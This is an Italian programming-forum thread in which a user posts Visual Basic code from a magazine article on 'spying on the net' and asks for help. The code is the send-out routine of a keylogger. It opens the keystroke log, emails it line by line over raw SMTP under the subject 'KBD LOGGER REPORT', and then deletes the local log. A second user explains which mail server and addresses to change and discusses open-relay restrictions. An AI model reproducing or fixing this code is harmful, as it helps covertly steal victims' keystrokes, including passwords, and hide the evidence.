Visualizzazione dei risultati da 1 a 7 su 7
  1. #1
    Utente di HTML.it L'avatar di ominox
    Registrato dal
    Dec 2001
    Messaggi
    218

    [VB]:Io Programmo di Luglio "Spiare in rete" mi aiutate?

    salve a tutti!
    ho un problema con il codice presente nell'ultimo numero di io programmo nell'articolo Di Elia Florio "spiare in rete".

    Non mi funziona l'invio tramite email dei file di log.
    Questo è il codice relativo:

    Private Sub smtp_send(fname As String)
    Winsock1.Protocol = sckTCPProtocol
    Winsock1.RemoteHost = "edmaster.it"
    Winsock1.RemotePort = 25

    Winsock1.Connect
    WaitFor ("220")
    If (networkErr = True) Then GoTo stop_send

    'ingresso sul server di posta
    Winsock1.SendData ("HELO kbdlogger" + vbCrLf)
    WaitFor ("250")
    If (networkErr = True) Then GoTo stop_send

    'specifica mittente
    '(controllare relay del server)
    Winsock1.SendData ("MAIL FROM: <aaaa@libero.it>" + vbCrLf)
    WaitFor ("250")
    If (networkErr = True) Then GoTo stop_send

    'specifica destinatario
    Winsock1.SendData ("RCPT TO: <bbbb@libero.it>" + vbCrLf)
    WaitFor ("250")
    If (networkErr = True) Then GoTo stop_send

    'corpo dell'e-mail
    Winsock1.SendData ("DATA" + vbCrLf)
    WaitFor ("354")
    If (networkErr = True) Then GoTo stop_send

    Winsock1.SendData ("From: ""KBD Logger"" <aaaaa@libero.it>" + vbCrLf)
    Winsock1.SendData ("To: """" <bbbbb@libero.it>" + vbCrLf)
    Winsock1.SendData ("Subject: KBD LOGGER REPORT " + vbCrLf + vbCrLf)

    'apre il file di log in lettura e lo invia riga dopo riga
    Dim TextLine
    Open (path + fname) For Input As #2
    Do While Not EOF(2)
    Line Input #2, TextLine
    Winsock1.SendData (TextLine + vbCrLf)
    Loop
    Close #2

    'chiude l'e-mail
    Winsock1.SendData ("." + vbCrLf)
    WaitFor ("250")
    If (networkErr = True) Then GoTo stop_send

    Winsock1.SendData ("QUIT" + vbCrLf)
    WaitFor ("221")

    Winsock1.Close

    'cancella il file di log appena inviato
    Kill (path + fname)

    stop_send:
    End Sub

    mi sapete dire se devo cambiare qualcosa?
    Forse qui?
    Winsock1.Protocol = sckTCPProtocol
    Winsock1.RemoteHost = "edmaster.it"
    Winsock1.RemotePort = 25
    Oppure si puo lascire così?
    Grazie
    Ciao

  2. #2
    Utente di HTML.it L'avatar di ominox
    Registrato dal
    Dec 2001
    Messaggi
    218
    up

  3. #3
    Utente di HTML.it L'avatar di darkblOOd
    Registrato dal
    Jul 2001
    Messaggi
    2,212
    devi specificare il server di posta al quae vuoi collegarti per mandare il messaggio

  4. #4
    Utente di HTML.it L'avatar di ominox
    Registrato dal
    Dec 2001
    Messaggi
    218
    dove lo devo specificare?
    e quale server di posta?
    uno qualsiasi?
    +grazie

  5. #5
    Utente di HTML.it L'avatar di darkblOOd
    Registrato dal
    Jul 2001
    Messaggi
    2,212

    Re: [VB]:Io Programmo di Luglio "Spiare in rete" mi aiutate?

    modificare qui (il provider al quale ti colleghi):
    Winsock1.RemoteHost = "edmaster.it"

    qui (al posto di libero il provider la quale sei collegato):
    Winsock1.SendData ("MAIL FROM: <aaaa@libero.it>" + vbCrLf)

    ovviamente qui:
    Winsock1.SendData ("RCPT TO: <bbbb@libero.it>" + vbCrLf)

    e qui di conseguenza:
    Winsock1.SendData ("From: ""KBD Logger"" <aaaaa@libero.it>" + vbCrLf)
    Winsock1.SendData ("To: """" <bbbbb@libero.it>" + vbCrLf)



  6. #6
    Utente di HTML.it L'avatar di ominox
    Registrato dal
    Dec 2001
    Messaggi
    218
    grazie per l'aiuto,ma quale provider di posta posso mettere?
    il mio dominio su aruba va bene?
    grazie

  7. #7
    Utente di HTML.it L'avatar di darkblOOd
    Registrato dal
    Jul 2001
    Messaggi
    2,212
    il problema fondamentale e uno : la quasi totalità dei provider ha disabilitato il relayng dei propri server di posta. NEl senso che una volta era possibile collegarsi con il server di tin.it (per inviare un msg ad un utente di lycos (per esempio).

    Adesso non è più possibile.

    Per inviare un msg ad un utente Lycos, dovresti collegarti ad un server di lycos, specificare un utente del tipo USER@LYCOS.IT (alcuni fanno pure il controllo per vedere se l'indirizzo specificato esiste altrimenti non ti fanno proseguire) e poi puoi mandare SOLO msg ad utenti di quel provider.

    Fai le prove sul tuo account (per evitare segnalazioni al provider di tentativi di abuso del servizio) e cerca di capire il funzionamento.
    Cerca pure le info sul protocollo SMTP (mi sembre se ne occupi la RFC 821) per vedere lo standard di funzionamento.

    Ciao

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.